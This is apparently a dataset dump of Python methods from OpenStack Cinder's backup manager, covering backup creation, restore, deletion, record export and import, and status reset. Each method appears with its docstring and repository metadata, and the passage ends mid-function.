def create_backup(self, context, backup): volume_id = backup.volume_id snapshot_id = backup.snapshot_id volume = objects.Volume.get_by_id(context, volume_id) snapshot = (objects.Snapshot.get_by_id(context, snapshot_id) if snapshot_id else None) previous_status = volume.get('previous_status', None) updates = {} if snapshot_id: log_message = ('Create backup started, backup: %(backup_id)s volume: %(volume_id)s snapshot: %(snapshot_id)s.' % {'backup_id': backup.id, 'volume_id': volume_id, 'snapshot_id': snapshot_id}) else: log_message = ('Create backup started, backup: %(backup_id)s volume: %(volume_id)s.' % {'backup_id': backup.id, 'volume_id': volume_id}) LOG.info(log_message) self._notify_about_backup_usage(context, backup, 'create.start') backup.host = self.host backup.service = self.driver_name backup.availability_zone = self.az backup.save() expected_status = 'backing-up' if snapshot_id: actual_status = snapshot['status'] if (actual_status != expected_status): err = (_('Create backup aborted, expected snapshot status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidSnapshot(reason=err) else: actual_status = volume['status'] if (actual_status != expected_status): err = (_('Create backup aborted, expected volume status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidVolume(reason=err) expected_status = fields.BackupStatus.CREATING actual_status = backup.status if (actual_status != expected_status): err = (_('Create backup aborted, expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) try: if (not self.is_working()): err = _('Create 
backup aborted due to backup service is down') self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) updates = self._run_backup(context, backup, volume) except Exception as err: with excutils.save_and_reraise_exception(): if snapshot_id: snapshot.status = fields.SnapshotStatus.AVAILABLE snapshot.save() else: self.db.volume_update(context, volume_id, {'status': previous_status, 'previous_status': 'error_backing-up'}) self._update_backup_error(backup, six.text_type(err)) if snapshot_id: self.db.snapshot_update(context, snapshot_id, {'status': fields.BackupStatus.AVAILABLE}) else: self.db.volume_update(context, volume_id, {'status': previous_status, 'previous_status': 'backing-up'}) backup.status = fields.BackupStatus.AVAILABLE backup.size = volume['size'] if updates: backup.update(updates) backup.save() if backup.parent_id: parent_backup = objects.Backup.get_by_id(context, backup.parent_id) parent_backup.num_dependent_backups += 1 parent_backup.save() LOG.info('Create backup finished. backup: %s.', backup.id) self._notify_about_backup_usage(context, backup, 'create.end')<|docstring|>Create volume backups using configured backup service.<|endoftext|>
fbe1f3c66f056c64251ae5712b818d69bd4ceb60e7b7b95908d503dfde412637
def restore_backup(self, context, backup, volume_id): 'Restore volume backups from configured backup service.' LOG.info('Restore backup started, backup: %(backup_id)s volume: %(volume_id)s.', {'backup_id': backup.id, 'volume_id': volume_id}) volume = objects.Volume.get_by_id(context, volume_id) self._notify_about_backup_usage(context, backup, 'restore.start') backup.host = self.host backup.save() expected_status = 'restoring-backup' actual_status = volume['status'] if (actual_status != expected_status): err = (_('Restore backup aborted, expected volume status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) backup.status = fields.BackupStatus.AVAILABLE backup.save() self.db.volume_update(context, volume_id, {'status': 'error_restoring'}) raise exception.InvalidVolume(reason=err) expected_status = fields.BackupStatus.RESTORING actual_status = backup['status'] if (actual_status != expected_status): err = (_('Restore backup aborted: expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) self.db.volume_update(context, volume_id, {'status': 'error'}) raise exception.InvalidBackup(reason=err) if (volume['size'] > backup['size']): LOG.info('Volume: %(vol_id)s, size: %(vol_size)d is larger than backup: %(backup_id)s, size: %(backup_size)d, continuing with restore.', {'vol_id': volume['id'], 'vol_size': volume['size'], 'backup_id': backup['id'], 'backup_size': backup['size']}) backup_service = self._map_service_to_driver(backup['service']) configured_service = self.driver_name if (backup_service not in configured_service): err = (_('Restore backup aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': 
backup_service}) backup.status = fields.BackupStatus.AVAILABLE backup.save() self.db.volume_update(context, volume_id, {'status': 'error'}) raise exception.InvalidBackup(reason=err) try: self._run_restore(context, backup, volume) except Exception: with excutils.save_and_reraise_exception(): self.db.volume_update(context, volume_id, {'status': 'error_restoring'}) backup.status = fields.BackupStatus.AVAILABLE backup.save() self.db.volume_update(context, volume_id, {'status': 'available'}) backup.status = fields.BackupStatus.AVAILABLE backup.save() LOG.info('Restore backup finished, backup %(backup_id)s restored to volume %(volume_id)s.', {'backup_id': backup.id, 'volume_id': volume_id}) self._notify_about_backup_usage(context, backup, 'restore.end')
Restore volume backups from configured backup service.
cinder/backup/manager.py
restore_backup
inspur-storage/cinder
1
python
def restore_backup(self, context, backup, volume_id): LOG.info('Restore backup started, backup: %(backup_id)s volume: %(volume_id)s.', {'backup_id': backup.id, 'volume_id': volume_id}) volume = objects.Volume.get_by_id(context, volume_id) self._notify_about_backup_usage(context, backup, 'restore.start') backup.host = self.host backup.save() expected_status = 'restoring-backup' actual_status = volume['status'] if (actual_status != expected_status): err = (_('Restore backup aborted, expected volume status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) backup.status = fields.BackupStatus.AVAILABLE backup.save() self.db.volume_update(context, volume_id, {'status': 'error_restoring'}) raise exception.InvalidVolume(reason=err) expected_status = fields.BackupStatus.RESTORING actual_status = backup['status'] if (actual_status != expected_status): err = (_('Restore backup aborted: expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) self.db.volume_update(context, volume_id, {'status': 'error'}) raise exception.InvalidBackup(reason=err) if (volume['size'] > backup['size']): LOG.info('Volume: %(vol_id)s, size: %(vol_size)d is larger than backup: %(backup_id)s, size: %(backup_size)d, continuing with restore.', {'vol_id': volume['id'], 'vol_size': volume['size'], 'backup_id': backup['id'], 'backup_size': backup['size']}) backup_service = self._map_service_to_driver(backup['service']) configured_service = self.driver_name if (backup_service not in configured_service): err = (_('Restore backup aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service}) backup.status = fields.BackupStatus.AVAILABLE 
backup.save() self.db.volume_update(context, volume_id, {'status': 'error'}) raise exception.InvalidBackup(reason=err) try: self._run_restore(context, backup, volume) except Exception: with excutils.save_and_reraise_exception(): self.db.volume_update(context, volume_id, {'status': 'error_restoring'}) backup.status = fields.BackupStatus.AVAILABLE backup.save() self.db.volume_update(context, volume_id, {'status': 'available'}) backup.status = fields.BackupStatus.AVAILABLE backup.save() LOG.info('Restore backup finished, backup %(backup_id)s restored to volume %(volume_id)s.', {'backup_id': backup.id, 'volume_id': volume_id}) self._notify_about_backup_usage(context, backup, 'restore.end')
def restore_backup(self, context, backup, volume_id): LOG.info('Restore backup started, backup: %(backup_id)s volume: %(volume_id)s.', {'backup_id': backup.id, 'volume_id': volume_id}) volume = objects.Volume.get_by_id(context, volume_id) self._notify_about_backup_usage(context, backup, 'restore.start') backup.host = self.host backup.save() expected_status = 'restoring-backup' actual_status = volume['status'] if (actual_status != expected_status): err = (_('Restore backup aborted, expected volume status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) backup.status = fields.BackupStatus.AVAILABLE backup.save() self.db.volume_update(context, volume_id, {'status': 'error_restoring'}) raise exception.InvalidVolume(reason=err) expected_status = fields.BackupStatus.RESTORING actual_status = backup['status'] if (actual_status != expected_status): err = (_('Restore backup aborted: expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) self.db.volume_update(context, volume_id, {'status': 'error'}) raise exception.InvalidBackup(reason=err) if (volume['size'] > backup['size']): LOG.info('Volume: %(vol_id)s, size: %(vol_size)d is larger than backup: %(backup_id)s, size: %(backup_size)d, continuing with restore.', {'vol_id': volume['id'], 'vol_size': volume['size'], 'backup_id': backup['id'], 'backup_size': backup['size']}) backup_service = self._map_service_to_driver(backup['service']) configured_service = self.driver_name if (backup_service not in configured_service): err = (_('Restore backup aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service}) backup.status = fields.BackupStatus.AVAILABLE 
backup.save() self.db.volume_update(context, volume_id, {'status': 'error'}) raise exception.InvalidBackup(reason=err) try: self._run_restore(context, backup, volume) except Exception: with excutils.save_and_reraise_exception(): self.db.volume_update(context, volume_id, {'status': 'error_restoring'}) backup.status = fields.BackupStatus.AVAILABLE backup.save() self.db.volume_update(context, volume_id, {'status': 'available'}) backup.status = fields.BackupStatus.AVAILABLE backup.save() LOG.info('Restore backup finished, backup %(backup_id)s restored to volume %(volume_id)s.', {'backup_id': backup.id, 'volume_id': volume_id}) self._notify_about_backup_usage(context, backup, 'restore.end')<|docstring|>Restore volume backups from configured backup service.<|endoftext|>
26a75c720374bbc9a8ffa74e37e1fe93f272a8b7071fedc95d114d5a50998a77
def delete_backup(self, context, backup): 'Delete volume backup from configured backup service.' LOG.info('Delete backup started, backup: %s.', backup.id) self._notify_about_backup_usage(context, backup, 'delete.start') backup.host = self.host backup.save() expected_status = fields.BackupStatus.DELETING actual_status = backup.status if (actual_status != expected_status): err = (_('Delete_backup aborted, expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) if (not self.is_working()): err = _('Delete backup is aborted due to backup service is down') status = fields.BackupStatus.ERROR_DELETING self._update_backup_error(backup, err, status) raise exception.InvalidBackup(reason=err) backup_service = self._map_service_to_driver(backup['service']) if (backup_service is not None): configured_service = self.driver_name if (backup_service not in configured_service): err = (_('Delete backup aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service}) self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) try: backup_service = self.get_backup_driver(context) backup_service.delete_backup(backup) except Exception as err: with excutils.save_and_reraise_exception(): self._update_backup_error(backup, six.text_type(err)) try: reserve_opts = {'backups': (- 1), 'backup_gigabytes': (- backup.size)} reservations = QUOTAS.reserve(context, project_id=backup.project_id, **reserve_opts) except Exception: reservations = None LOG.exception('Failed to update usages deleting backup') if (backup.encryption_key_id is not None): volume_utils.delete_encryption_key(context, key_manager.API(CONF), backup.encryption_key_id) 
backup.encryption_key_id = None backup.save() backup.destroy() if backup.parent_id: parent_backup = objects.Backup.get_by_id(context, backup.parent_id) if parent_backup.has_dependent_backups: parent_backup.num_dependent_backups -= 1 parent_backup.save() if reservations: QUOTAS.commit(context, reservations, project_id=backup.project_id) LOG.info('Delete backup finished, backup %s deleted.', backup.id) self._notify_about_backup_usage(context, backup, 'delete.end')
Delete volume backup from configured backup service.
cinder/backup/manager.py
delete_backup
inspur-storage/cinder
1
python
def delete_backup(self, context, backup): LOG.info('Delete backup started, backup: %s.', backup.id) self._notify_about_backup_usage(context, backup, 'delete.start') backup.host = self.host backup.save() expected_status = fields.BackupStatus.DELETING actual_status = backup.status if (actual_status != expected_status): err = (_('Delete_backup aborted, expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) if (not self.is_working()): err = _('Delete backup is aborted due to backup service is down') status = fields.BackupStatus.ERROR_DELETING self._update_backup_error(backup, err, status) raise exception.InvalidBackup(reason=err) backup_service = self._map_service_to_driver(backup['service']) if (backup_service is not None): configured_service = self.driver_name if (backup_service not in configured_service): err = (_('Delete backup aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service}) self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) try: backup_service = self.get_backup_driver(context) backup_service.delete_backup(backup) except Exception as err: with excutils.save_and_reraise_exception(): self._update_backup_error(backup, six.text_type(err)) try: reserve_opts = {'backups': (- 1), 'backup_gigabytes': (- backup.size)} reservations = QUOTAS.reserve(context, project_id=backup.project_id, **reserve_opts) except Exception: reservations = None LOG.exception('Failed to update usages deleting backup') if (backup.encryption_key_id is not None): volume_utils.delete_encryption_key(context, key_manager.API(CONF), backup.encryption_key_id) backup.encryption_key_id = None backup.save() backup.destroy() 
if backup.parent_id: parent_backup = objects.Backup.get_by_id(context, backup.parent_id) if parent_backup.has_dependent_backups: parent_backup.num_dependent_backups -= 1 parent_backup.save() if reservations: QUOTAS.commit(context, reservations, project_id=backup.project_id) LOG.info('Delete backup finished, backup %s deleted.', backup.id) self._notify_about_backup_usage(context, backup, 'delete.end')
def delete_backup(self, context, backup): LOG.info('Delete backup started, backup: %s.', backup.id) self._notify_about_backup_usage(context, backup, 'delete.start') backup.host = self.host backup.save() expected_status = fields.BackupStatus.DELETING actual_status = backup.status if (actual_status != expected_status): err = (_('Delete_backup aborted, expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) if (not self.is_working()): err = _('Delete backup is aborted due to backup service is down') status = fields.BackupStatus.ERROR_DELETING self._update_backup_error(backup, err, status) raise exception.InvalidBackup(reason=err) backup_service = self._map_service_to_driver(backup['service']) if (backup_service is not None): configured_service = self.driver_name if (backup_service not in configured_service): err = (_('Delete backup aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service}) self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) try: backup_service = self.get_backup_driver(context) backup_service.delete_backup(backup) except Exception as err: with excutils.save_and_reraise_exception(): self._update_backup_error(backup, six.text_type(err)) try: reserve_opts = {'backups': (- 1), 'backup_gigabytes': (- backup.size)} reservations = QUOTAS.reserve(context, project_id=backup.project_id, **reserve_opts) except Exception: reservations = None LOG.exception('Failed to update usages deleting backup') if (backup.encryption_key_id is not None): volume_utils.delete_encryption_key(context, key_manager.API(CONF), backup.encryption_key_id) backup.encryption_key_id = None backup.save() backup.destroy() 
if backup.parent_id: parent_backup = objects.Backup.get_by_id(context, backup.parent_id) if parent_backup.has_dependent_backups: parent_backup.num_dependent_backups -= 1 parent_backup.save() if reservations: QUOTAS.commit(context, reservations, project_id=backup.project_id) LOG.info('Delete backup finished, backup %s deleted.', backup.id) self._notify_about_backup_usage(context, backup, 'delete.end')<|docstring|>Delete volume backup from configured backup service.<|endoftext|>
40ba5d49ef5db0d2f05c95ef65cf869e887fa6c7df36b7f7a5fff1a5055c60ff
def export_record(self, context, backup): "Export all volume backup metadata details to allow clean import.\n\n Export backup metadata so it could be re-imported into the database\n without any prerequisite in the backup database.\n\n :param context: running context\n :param backup: backup object to export\n :returns: backup_record - a description of how to import the backup\n :returns: contains 'backup_url' - how to import the backup, and\n :returns: 'backup_service' describing the needed driver.\n :raises InvalidBackup:\n " LOG.info('Export record started, backup: %s.', backup.id) expected_status = fields.BackupStatus.AVAILABLE actual_status = backup.status if (actual_status != expected_status): err = (_('Export backup aborted, expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) raise exception.InvalidBackup(reason=err) backup_record = {'backup_service': backup.service} backup_service = self._map_service_to_driver(backup.service) configured_service = self.driver_name if (backup_service not in configured_service): err = (_('Export record aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service}) raise exception.InvalidBackup(reason=err) try: backup_service = self.get_backup_driver(context) driver_info = backup_service.export_record(backup) backup_url = backup.encode_record(driver_info=driver_info) backup_record['backup_url'] = backup_url except Exception as err: msg = six.text_type(err) raise exception.InvalidBackup(reason=msg) LOG.info('Export record finished, backup %s exported.', backup.id) return backup_record
Export all volume backup metadata details to allow clean import. Export backup metadata so it could be re-imported into the database without any prerequisite in the backup database. :param context: running context :param backup: backup object to export :returns: backup_record - a description of how to import the backup :returns: contains 'backup_url' - how to import the backup, and :returns: 'backup_service' describing the needed driver. :raises InvalidBackup:
cinder/backup/manager.py
export_record
inspur-storage/cinder
1
python
def export_record(self, context, backup): "Export all volume backup metadata details to allow clean import.\n\n Export backup metadata so it could be re-imported into the database\n without any prerequisite in the backup database.\n\n :param context: running context\n :param backup: backup object to export\n :returns: backup_record - a description of how to import the backup\n :returns: contains 'backup_url' - how to import the backup, and\n :returns: 'backup_service' describing the needed driver.\n :raises InvalidBackup:\n " LOG.info('Export record started, backup: %s.', backup.id) expected_status = fields.BackupStatus.AVAILABLE actual_status = backup.status if (actual_status != expected_status): err = (_('Export backup aborted, expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) raise exception.InvalidBackup(reason=err) backup_record = {'backup_service': backup.service} backup_service = self._map_service_to_driver(backup.service) configured_service = self.driver_name if (backup_service not in configured_service): err = (_('Export record aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service}) raise exception.InvalidBackup(reason=err) try: backup_service = self.get_backup_driver(context) driver_info = backup_service.export_record(backup) backup_url = backup.encode_record(driver_info=driver_info) backup_record['backup_url'] = backup_url except Exception as err: msg = six.text_type(err) raise exception.InvalidBackup(reason=msg) LOG.info('Export record finished, backup %s exported.', backup.id) return backup_record
def export_record(self, context, backup): "Export all volume backup metadata details to allow clean import.\n\n Export backup metadata so it could be re-imported into the database\n without any prerequisite in the backup database.\n\n :param context: running context\n :param backup: backup object to export\n :returns: backup_record - a description of how to import the backup\n :returns: contains 'backup_url' - how to import the backup, and\n :returns: 'backup_service' describing the needed driver.\n :raises InvalidBackup:\n " LOG.info('Export record started, backup: %s.', backup.id) expected_status = fields.BackupStatus.AVAILABLE actual_status = backup.status if (actual_status != expected_status): err = (_('Export backup aborted, expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) raise exception.InvalidBackup(reason=err) backup_record = {'backup_service': backup.service} backup_service = self._map_service_to_driver(backup.service) configured_service = self.driver_name if (backup_service not in configured_service): err = (_('Export record aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service}) raise exception.InvalidBackup(reason=err) try: backup_service = self.get_backup_driver(context) driver_info = backup_service.export_record(backup) backup_url = backup.encode_record(driver_info=driver_info) backup_record['backup_url'] = backup_url except Exception as err: msg = six.text_type(err) raise exception.InvalidBackup(reason=msg) LOG.info('Export record finished, backup %s exported.', backup.id) return backup_record<|docstring|>Export all volume backup metadata details to allow clean import. 
Export backup metadata so it could be re-imported into the database without any prerequisite in the backup database. :param context: running context :param backup: backup object to export :returns: backup_record - a description of how to import the backup :returns: contains 'backup_url' - how to import the backup, and :returns: 'backup_service' describing the needed driver. :raises InvalidBackup:<|endoftext|>
72a2e54b8b2d0788daef130c6352eb70c5ede01dd371a3474e77fcb281cf8af0
def import_record(self, context, backup, backup_service, backup_url, backup_hosts): 'Import all volume backup metadata details to the backup db.\n\n :param context: running context\n :param backup: The new backup object for the import\n :param backup_service: The needed backup driver for import\n :param backup_url: An identifier string to locate the backup\n :param backup_hosts: Potential hosts to execute the import\n :raises InvalidBackup:\n :raises ServiceNotFound:\n ' LOG.info('Import record started, backup_url: %s.', backup_url) if (backup_service != self.driver_name): if (len(backup_hosts) > 0): first_host = backup_hosts.pop() self.backup_rpcapi.import_record(context, first_host, backup, backup_service, backup_url, backup_hosts) else: err = (_('Import record failed, cannot find backup service to perform the import. Request service %(service)s.') % {'service': backup_service}) self._update_backup_error(backup, err) raise exception.ServiceNotFound(service_id=backup_service) else: try: backup_options = backup.decode_record(backup_url) driver_options = backup_options.pop('driver_info', {}) backup_service = self.get_backup_driver(context) backup_service.import_record(backup, driver_options) except Exception as err: msg = six.text_type(err) self._update_backup_error(backup, msg) raise exception.InvalidBackup(reason=msg) required_import_options = {'display_name', 'display_description', 'container', 'size', 'service_metadata', 'object_count', 'id'} missing_opts = (required_import_options - set(backup_options)) if missing_opts: msg = (_('Driver successfully decoded imported backup data, but there are missing fields (%s).') % ', '.join(missing_opts)) self._update_backup_error(backup, msg) raise exception.InvalidBackup(reason=msg) backup_id = backup_options['id'] if (backup_id != backup.id): msg = (_('Trying to import backup metadata from id %(meta_id)s into backup %(id)s.') % {'meta_id': backup_id, 'id': backup.id}) self._update_backup_error(backup, msg) raise 
exception.InvalidBackup(reason=msg) backup_options['service'] = self.driver_name backup_options['availability_zone'] = self.az backup_options['host'] = self.host for key in ('name', 'user_id', 'project_id', 'deleted_at', 'deleted', 'fail_reason', 'status'): backup_options.pop(key, None) backup.update(backup_options) backup.save() try: if isinstance(backup_service, driver.BackupDriverWithVerify): backup_service.verify(backup.id) else: LOG.warning('Backup service %(service)s does not support verify. Backup id %(id)s is not verified. Skipping verify.', {'service': self.driver_name, 'id': backup.id}) except exception.InvalidBackup as err: with excutils.save_and_reraise_exception(): self._update_backup_error(backup, six.text_type(err)) backup.update({'status': fields.BackupStatus.AVAILABLE}) backup.save() LOG.info('Import record id %s metadata from driver finished.', backup.id)
Import all volume backup metadata details to the backup db. :param context: running context :param backup: The new backup object for the import :param backup_service: The needed backup driver for import :param backup_url: An identifier string to locate the backup :param backup_hosts: Potential hosts to execute the import :raises InvalidBackup: :raises ServiceNotFound:
cinder/backup/manager.py
import_record
inspur-storage/cinder
1
python
def import_record(self, context, backup, backup_service, backup_url, backup_hosts): 'Import all volume backup metadata details to the backup db.\n\n :param context: running context\n :param backup: The new backup object for the import\n :param backup_service: The needed backup driver for import\n :param backup_url: An identifier string to locate the backup\n :param backup_hosts: Potential hosts to execute the import\n :raises InvalidBackup:\n :raises ServiceNotFound:\n ' LOG.info('Import record started, backup_url: %s.', backup_url) if (backup_service != self.driver_name): if (len(backup_hosts) > 0): first_host = backup_hosts.pop() self.backup_rpcapi.import_record(context, first_host, backup, backup_service, backup_url, backup_hosts) else: err = (_('Import record failed, cannot find backup service to perform the import. Request service %(service)s.') % {'service': backup_service}) self._update_backup_error(backup, err) raise exception.ServiceNotFound(service_id=backup_service) else: try: backup_options = backup.decode_record(backup_url) driver_options = backup_options.pop('driver_info', {}) backup_service = self.get_backup_driver(context) backup_service.import_record(backup, driver_options) except Exception as err: msg = six.text_type(err) self._update_backup_error(backup, msg) raise exception.InvalidBackup(reason=msg) required_import_options = {'display_name', 'display_description', 'container', 'size', 'service_metadata', 'object_count', 'id'} missing_opts = (required_import_options - set(backup_options)) if missing_opts: msg = (_('Driver successfully decoded imported backup data, but there are missing fields (%s).') % ', '.join(missing_opts)) self._update_backup_error(backup, msg) raise exception.InvalidBackup(reason=msg) backup_id = backup_options['id'] if (backup_id != backup.id): msg = (_('Trying to import backup metadata from id %(meta_id)s into backup %(id)s.') % {'meta_id': backup_id, 'id': backup.id}) self._update_backup_error(backup, msg) raise 
exception.InvalidBackup(reason=msg) backup_options['service'] = self.driver_name backup_options['availability_zone'] = self.az backup_options['host'] = self.host for key in ('name', 'user_id', 'project_id', 'deleted_at', 'deleted', 'fail_reason', 'status'): backup_options.pop(key, None) backup.update(backup_options) backup.save() try: if isinstance(backup_service, driver.BackupDriverWithVerify): backup_service.verify(backup.id) else: LOG.warning('Backup service %(service)s does not support verify. Backup id %(id)s is not verified. Skipping verify.', {'service': self.driver_name, 'id': backup.id}) except exception.InvalidBackup as err: with excutils.save_and_reraise_exception(): self._update_backup_error(backup, six.text_type(err)) backup.update({'status': fields.BackupStatus.AVAILABLE}) backup.save() LOG.info('Import record id %s metadata from driver finished.', backup.id)
def import_record(self, context, backup, backup_service, backup_url, backup_hosts): 'Import all volume backup metadata details to the backup db.\n\n :param context: running context\n :param backup: The new backup object for the import\n :param backup_service: The needed backup driver for import\n :param backup_url: An identifier string to locate the backup\n :param backup_hosts: Potential hosts to execute the import\n :raises InvalidBackup:\n :raises ServiceNotFound:\n ' LOG.info('Import record started, backup_url: %s.', backup_url) if (backup_service != self.driver_name): if (len(backup_hosts) > 0): first_host = backup_hosts.pop() self.backup_rpcapi.import_record(context, first_host, backup, backup_service, backup_url, backup_hosts) else: err = (_('Import record failed, cannot find backup service to perform the import. Request service %(service)s.') % {'service': backup_service}) self._update_backup_error(backup, err) raise exception.ServiceNotFound(service_id=backup_service) else: try: backup_options = backup.decode_record(backup_url) driver_options = backup_options.pop('driver_info', {}) backup_service = self.get_backup_driver(context) backup_service.import_record(backup, driver_options) except Exception as err: msg = six.text_type(err) self._update_backup_error(backup, msg) raise exception.InvalidBackup(reason=msg) required_import_options = {'display_name', 'display_description', 'container', 'size', 'service_metadata', 'object_count', 'id'} missing_opts = (required_import_options - set(backup_options)) if missing_opts: msg = (_('Driver successfully decoded imported backup data, but there are missing fields (%s).') % ', '.join(missing_opts)) self._update_backup_error(backup, msg) raise exception.InvalidBackup(reason=msg) backup_id = backup_options['id'] if (backup_id != backup.id): msg = (_('Trying to import backup metadata from id %(meta_id)s into backup %(id)s.') % {'meta_id': backup_id, 'id': backup.id}) self._update_backup_error(backup, msg) raise 
exception.InvalidBackup(reason=msg) backup_options['service'] = self.driver_name backup_options['availability_zone'] = self.az backup_options['host'] = self.host for key in ('name', 'user_id', 'project_id', 'deleted_at', 'deleted', 'fail_reason', 'status'): backup_options.pop(key, None) backup.update(backup_options) backup.save() try: if isinstance(backup_service, driver.BackupDriverWithVerify): backup_service.verify(backup.id) else: LOG.warning('Backup service %(service)s does not support verify. Backup id %(id)s is not verified. Skipping verify.', {'service': self.driver_name, 'id': backup.id}) except exception.InvalidBackup as err: with excutils.save_and_reraise_exception(): self._update_backup_error(backup, six.text_type(err)) backup.update({'status': fields.BackupStatus.AVAILABLE}) backup.save() LOG.info('Import record id %s metadata from driver finished.', backup.id)<|docstring|>Import all volume backup metadata details to the backup db. :param context: running context :param backup: The new backup object for the import :param backup_service: The needed backup driver for import :param backup_url: An identifier string to locate the backup :param backup_hosts: Potential hosts to execute the import :raises InvalidBackup: :raises ServiceNotFound:<|endoftext|>
49015b7c2be4f807d72199b3faf7c623267381995e35dfb3a1f68a784e76842c
def reset_status(self, context, backup, status): 'Reset volume backup status.\n\n :param context: running context\n :param backup: The backup object for reset status operation\n :param status: The status to be set\n :raises InvalidBackup:\n :raises BackupVerifyUnsupportedDriver:\n :raises AttributeError:\n ' LOG.info('Reset backup status started, backup_id: %(backup_id)s, status: %(status)s.', {'backup_id': backup.id, 'status': status}) backup_service_name = self._map_service_to_driver(backup.service) LOG.info('Backup service: %s.', backup_service_name) if (backup_service_name is not None): configured_service = self.driver_name if (backup_service_name not in configured_service): err = (_('Reset backup status aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service_name}) raise exception.InvalidBackup(reason=err) try: if ((status == fields.BackupStatus.AVAILABLE) and (backup['status'] != fields.BackupStatus.RESTORING)): backup_service = self.get_backup_driver(context) if isinstance(backup_service, driver.BackupDriverWithVerify): backup_service.verify(backup.id) backup.status = status backup.save() else: msg = (_('Backup service %(configured_service)s does not support verify. Backup id %(id)s is not verified. Skipping verify.') % {'configured_service': self.driver_name, 'id': backup.id}) raise exception.BackupVerifyUnsupportedDriver(reason=msg) elif ((status == fields.BackupStatus.ERROR) or ((status == fields.BackupStatus.AVAILABLE) and (backup.status == fields.BackupStatus.RESTORING))): backup.status = status backup.save() except exception.InvalidBackup: with excutils.save_and_reraise_exception(): LOG.error('Backup id %s is not invalid. 
Skipping reset.', backup.id) except exception.BackupVerifyUnsupportedDriver: with excutils.save_and_reraise_exception(): LOG.error('Backup service %(configured_service)s does not support verify. Backup id %(id)s is not verified. Skipping verify.', {'configured_service': self.driver_name, 'id': backup.id}) except AttributeError: msg = (_('Backup service %(service)s does not support verify. Backup id %(id)s is not verified. Skipping reset.') % {'service': self.driver_name, 'id': backup.id}) LOG.error(msg) raise exception.BackupVerifyUnsupportedDriver(reason=msg) try: self._cleanup_temp_volumes_snapshots_for_one_backup(context, backup) except Exception: LOG.exception('Problem cleaning temp volumes and snapshots for backup %(bkup)s.', {'bkup': backup.id}) notifier_info = {'id': backup.id, 'update': {'status': status}} notifier = rpc.get_notifier('backupStatusUpdate') notifier.info(context, 'backups.reset_status.end', notifier_info)
Reset volume backup status. :param context: running context :param backup: The backup object for reset status operation :param status: The status to be set :raises InvalidBackup: :raises BackupVerifyUnsupportedDriver: :raises AttributeError:
cinder/backup/manager.py
reset_status
inspur-storage/cinder
1
python
def reset_status(self, context, backup, status): 'Reset volume backup status.\n\n :param context: running context\n :param backup: The backup object for reset status operation\n :param status: The status to be set\n :raises InvalidBackup:\n :raises BackupVerifyUnsupportedDriver:\n :raises AttributeError:\n ' LOG.info('Reset backup status started, backup_id: %(backup_id)s, status: %(status)s.', {'backup_id': backup.id, 'status': status}) backup_service_name = self._map_service_to_driver(backup.service) LOG.info('Backup service: %s.', backup_service_name) if (backup_service_name is not None): configured_service = self.driver_name if (backup_service_name not in configured_service): err = (_('Reset backup status aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service_name}) raise exception.InvalidBackup(reason=err) try: if ((status == fields.BackupStatus.AVAILABLE) and (backup['status'] != fields.BackupStatus.RESTORING)): backup_service = self.get_backup_driver(context) if isinstance(backup_service, driver.BackupDriverWithVerify): backup_service.verify(backup.id) backup.status = status backup.save() else: msg = (_('Backup service 